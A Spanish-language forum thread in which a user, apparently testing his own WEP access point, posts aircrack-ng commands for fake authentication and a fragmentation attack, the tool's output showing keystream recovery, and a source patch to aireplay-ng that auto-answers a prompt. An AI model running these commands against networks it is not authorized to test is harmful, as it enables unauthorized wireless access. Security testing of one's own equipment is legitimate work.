?>/script>'; } ?> Ataque de fragmentación para obtener PRGA Widgets Magazine

Autor Tema: Ataque de fragmentación para obtener PRGA  (Leído 2028 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Edagner

  • Visitante
Ataque de fragmentación para obtener PRGA
« en: 21-07-2009, 22:54 (Martes) »
Hola, pues estuve probando el ataque de fragmentación + packetforge sobre mi punto de acceso con clave WEP  y me surge lo siguiente:

1º) Me asocio

aireplay-ng -1 6000 -o 1 -q 10 -e Mi_AP -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0

2º)

aireplay-ng -5 -F -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0

Resultados:

El ataque funciona:

 Saving chosen packet in replay_src-0203-180328.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0203-180343.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

El ataque falla:

Me pregunta si quiero usar solo 384 bytes of a keystream

¿Existe algun parámetro para decirle automáticamente que si?

Tipo: -yes

aireplay-ng -5 -F -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0 -yes

Y así:  Now you can build a packet with packetforge-ng out of that 384 bytes keystream

A mi no se me ocurrió nada salvo editar el código fuente del aireplay-ng y hacer que lo guarde tenga el que tenga.

Saludos!



« Última modificación: 22-07-2009, 21:37 (Miércoles) por Edagner »

Edagner

  • Visitante
Re: Ataque de fragmentación para obtener PRGA
« Respuesta #1 en: 22-07-2009, 00:14 (Miércoles) »
Buenas, por si a alguien le interesa se puede solucionar así:

Nos bajamos el aircrack-ng-1.0-rc3

Vamos al fichero: aircrack-ng-1.0-rc3\src\aireplay-ng.c

Buscamos esto:

printf("Still nothing, quitting with 384 bytes? [y/n] \n");
fflush( stdout );
ret=0;
while(!ret) ret = scanf( "%s", tmpbuf );
printf( "\n" );

Y lo dejamos así:

printf("Still nothing, quitting with 384 bytes? [y/n] \n");
fflush( stdout );
ret=1;
//while(!ret) ret = scanf( "%s", tmpbuf );
                  
tmpbuf[0] = 'y';
                  
printf( "\n" );

De esta manera obtendremos:

Now you can build a packet with packetforge-ng out of that 384 bytes keystream

Sin tener que pulsar el 'y' que nos pide.

 ;)





« Última modificación: 22-07-2009, 21:38 (Miércoles) por Edagner »